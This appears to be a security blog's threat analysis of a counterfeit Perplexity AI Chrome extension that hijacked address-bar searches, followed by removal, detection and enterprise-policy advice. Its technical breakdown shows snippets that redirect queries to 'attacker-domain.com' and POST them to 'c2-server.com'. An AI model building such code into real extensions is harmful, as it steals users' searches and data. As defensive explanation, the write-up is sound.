Malicious Perplexity Chrome Extension Intercepted User Searches

A counterfeit Perplexity AI Chrome extension was discovered intercepting user search queries and address bar inputs, redirecting traffic through attacker-controlled domains. The malicious extension mimicked the legitimate Perplexity AI service, exploiting user trust to harvest browsing data and potentially monetize hijacked searches. Users who installed the fake extension from unofficial sources faced significant privacy risks and data exposure. This incident highlights the ongoing threat of malicious browser extensions targeting popular AI services.

Introduction

Browser extensions have become a prime vector for cybercriminals seeking to compromise user data and manipulate web traffic. In a recent campaign, threat actors developed a fraudulent Chrome extension impersonating Perplexity AI—a popular AI-powered search engine. The malicious extension intercepted search queries entered directly into Chrome’s address bar (omnibox) and redirected users through attacker-controlled infrastructure.

Unlike traditional adware that simply injects advertisements, this extension operated as a sophisticated search hijacker, capturing real-time user inputs before they reached legitimate search providers. The attack demonstrates how cybercriminals leverage brand recognition of trending AI services to distribute malware and monetize stolen traffic through affiliate schemes and data collection.

This analysis examines the technical mechanisms employed by the malicious extension, the risks it posed to affected users, and defensive measures to prevent similar compromises.

Background & Context

Perplexity AI has gained significant popularity as an alternative search interface powered by large language models. As with any trending technology, threat actors quickly recognized an opportunity to exploit user interest through malicious impersonation.

Browser extension-based threats have evolved considerably in recent years. Modern malicious extensions employ sophisticated techniques including:

  • Permission abuse: Requesting broad access to browsing data under legitimate-sounding pretexts
  • Brand impersonation: Copying logos, names, and descriptions of popular services
  • Traffic monetization: Redirecting searches through affiliate networks or selling harvested data
  • Persistence mechanisms: Making removal difficult through multiple installation hooks

The Chrome Web Store implements security measures to prevent malicious extensions, but threat actors frequently circumvent these protections by distributing malware through third-party websites, phishing campaigns, and social engineering tactics. Users seeking free access to premium features or early releases often download extensions from untrusted sources, creating attack opportunities.

Search hijacking specifically represents a lucrative threat vector. By intercepting and redirecting search queries, attackers can:

  • Earn affiliate commissions from sponsored search results
  • Harvest valuable data about user interests and behavior
  • Inject malicious results or phishing links
  • Profile users for targeted attacks

Technical Breakdown

The malicious Perplexity extension implemented several technical mechanisms to intercept and exfiltrate user data:

Manifest Permissions

The extension requested excessive permissions in its manifest file, including:

{
  "permissions": [
    "tabs",
    "webNavigation",
    "webRequest",
    "webRequestBlocking",
    ":///*"
  ]
}

These permissions granted the extension:

  • Access to all websites (:///*)
  • Ability to monitor navigation events
  • Power to intercept and modify web requests
  • Capability to read and alter tab content

Omnibox Hijacking

The extension registered as an omnibox handler, intercepting queries entered directly into Chrome’s address bar. When users typed searches, the extension captured input before transmission to the default search engine:

chrome.omnibox.onInputEntered.addListener(function(text) {
  var redirectUrl = "https://attacker-domain.com/search?q=" + encodeURIComponent(text);
  chrome.tabs.update({url: redirectUrl});
});

This mechanism allowed complete interception of organic search behavior without visible modification to the browser interface.

Traffic Redirection

Captured searches were redirected through a chain of attacker-controlled domains:

  • Initial redirect to data collection endpoint
  • Logging of search query, timestamp, and user identifier
  • Secondary redirect to legitimate search results (often Bing or Google)
  • Affiliate parameters appended to monetize clicks

The redirection chain obscured the malicious activity from casual users while generating revenue for the threat actors:

User Query → Extension Capture → attacker-domain.com/track 
→ affiliate-network.com/?ref=XXXXX → search-engine.com/results

Data Exfiltration

The extension transmitted collected data to remote servers via encrypted HTTPS requests:

fetch('https://c2-server.com/collect', {
  method: 'POST',
  headers: {'Content-Type': 'application/json'},
  body: JSON.stringify({
    query: searchText,
    timestamp: Date.now(),
    uid: userId
  })
});

Harvested data included search queries, browsing timestamps, and persistent user identifiers for tracking across sessions.

Impact & Risk Assessment

Immediate Risks

Privacy Violation: All search queries and address bar inputs were captured and transmitted to attacker infrastructure. This included potentially sensitive searches related to health, finances, personal relationships, and confidential business matters.

Data Monetization: Stolen search data could be sold to data brokers, used for targeted advertising, or leveraged for social engineering attacks against high-value targets.

Credential Exposure: Users entering credentials or sensitive information directly into the address bar (a common mistake) exposed this data to the attackers.

Secondary Threats

Profile Development: Continuous monitoring enabled attackers to build comprehensive behavioral profiles, mapping interests, schedules, and online habits.

Supply Chain Risk: Organizations whose employees installed the extension potentially exposed corporate search patterns and competitive intelligence.

Future Targeting: Harvested data provided foundation for subsequent spear-phishing campaigns or account compromise attempts.

Affected Population

While precise infection numbers remain unknown, indicators suggest hundreds to potentially thousands of installations before detection. Users who downloaded the extension from third-party software repositories, tutorial sites, or through search result poisoning faced exposure.

Vendor Response

Perplexity AI issued public warnings about the fraudulent extension, emphasizing they do not currently offer an official Chrome extension. The company established verification channels for users to confirm legitimate products and reported the malicious extension to Google’s security team.

Google’s Chrome Web Store security team investigated reports and confirmed the extension was distributed outside official channels. Since the malicious software never appeared in the legitimate Chrome Web Store, takedown focused on identifying and neutralizing the distribution infrastructure.

Domain registrars received abuse complaints for the command-and-control servers and redirect domains involved in the operation. Several domains were subsequently suspended, disrupting the attacker’s monetization infrastructure.

Law enforcement notification was initiated through appropriate channels, though attribution remains under investigation. The operation’s relatively sophisticated technical implementation suggests involvement of experienced cybercriminals rather than opportunistic actors.

Mitigations & Workarounds

Immediate Actions for Affected Users

Remove the Extension:

  • Navigate to chrome://extensions/
  • Enable “Developer mode” to view all extensions
  • Locate any Perplexity-related extensions
  • Click “Remove” and confirm deletion

Clear Browser Data:

Settings → Privacy and Security → Clear Browsing Data
Select: Cookies, Cache, Site Settings
Time Range: All Time

Reset Search Engine Settings:

Settings → Search Engine → Manage Search Engines
Remove unknown or suspicious entries
Restore preferred default search engine

Change Compromised Credentials: Any passwords or sensitive information entered during the infection period should be changed immediately, prioritizing financial accounts and email.

Verification Steps

Confirm removal by checking:

# Check Chrome's Secure Preferences file (macOS/Linux)
cat ~/Library/Application\ Support/Google/Chrome/Default/Secure\ Preferences | grep -i perplexity

No results should appear if the extension was fully removed.

Detection & Monitoring

Endpoint Monitoring

Security teams should monitor for indicators including:

Suspicious Extension Installation:

  • Extensions with excessive permissions
  • Software installed from non-standard sources
  • Extensions mimicking popular AI services

Network Traffic Patterns:

Outbound HTTPS POST requests to unknown domains
Frequent connections to recently-registered domains
Traffic patterns correlating with user search behavior

Registry and File System Changes (Windows):

HKEY_CURRENT_USER\Software\Google\Chrome\Extensions
Check for unauthorized extension IDs

Enterprise Controls

Organizations should implement:

  • Extension Whitelisting: Chrome Enterprise policy restricting installations to approved extensions
  • DNS Filtering: Block known malicious domains associated with the campaign
  • Endpoint Detection Rules: Alert on suspicious extension installations
  • User Education: Training on verifying extension authenticity

Behavioral Indicators

Monitor for:

  • Unexpected search result redirections
  • Modified address bar behavior
  • Increased latency in search operations
  • Unknown domains appearing in network logs

Best Practices

Extension Security Hygiene

Verify Before Installing:

  • Only download extensions from official Chrome Web Store
  • Confirm developer identity matches legitimate vendor
  • Review permissions requested against actual functionality
  • Check user reviews and installation counts

Regular Audits:
Periodically review installed extensions:

chrome://extensions/ 
Disable unused extensions
Remove unfamiliar software
Verify all extensions remain necessary

Permission Awareness:
Be suspicious of extensions requesting:

  • Access to all websites
  • Ability to read and modify data
  • Network interception capabilities
  • Background execution permissions

Organizational Controls

Chrome Enterprise Policies:

{
  "ExtensionInstallBlacklist": ["*"],
  "ExtensionInstallWhitelist": [
    "approved-extension-id-1",
    "approved-extension-id-2"
  ],
  "ExtensionInstallForcelist": [
    "security-extension-id"
  ]
}

Security Awareness Training:

  • Educate users about extension risks
  • Establish approval processes for new extensions
  • Provide channels for reporting suspicious software
  • Simulate extension-based phishing scenarios

Personal Security Measures

  • Enable Chrome Sync with strong authentication to backup legitimate settings
  • Use password managers instead of typing credentials into address bar
  • Implement two-factor authentication on critical accounts
  • Subscribe to security advisories for frequently-used services

Key Takeaways

🔴 Brand Impersonation Remains Effective: Threat actors successfully exploited Perplexity AI’s popularity to distribute malware, demonstrating the continued effectiveness of impersonation attacks.

🔴 Browser Extensions Pose Significant Risk: Extensions with broad permissions can compromise all browsing activity, making them high-value targets for attackers.

🔴 Search Hijacking Enables Monetization: Intercepted search traffic generates revenue through affiliate schemes while harvesting valuable user data.

🔴 Official Distribution Channels Are Critical: Installing software from unofficial sources dramatically increases compromise risk.

🔴 Detection Requires Active Monitoring: Malicious extensions often operate silently, requiring deliberate verification to identify.

🔴 Privacy Impact Extends Beyond Immediate Theft: Harvested search data enables long-term profiling and future targeted attacks.

Organizations and individuals must treat browser extensions as critical security components requiring careful vetting, ongoing monitoring, and regular audits. The intersection of AI service popularity and extension distribution creates persistent opportunities for threat actors that demand heightened vigilance.

References


Stay updated at https://cydhaal.com — Your Daily Dose of Cyber Intelligence.
📧 Subscribe to our newsletter at https://cydhaal.com/newsletter/


Leave a Reply

Your email address will not be published. Required fields are marked *

📢 Join Telegram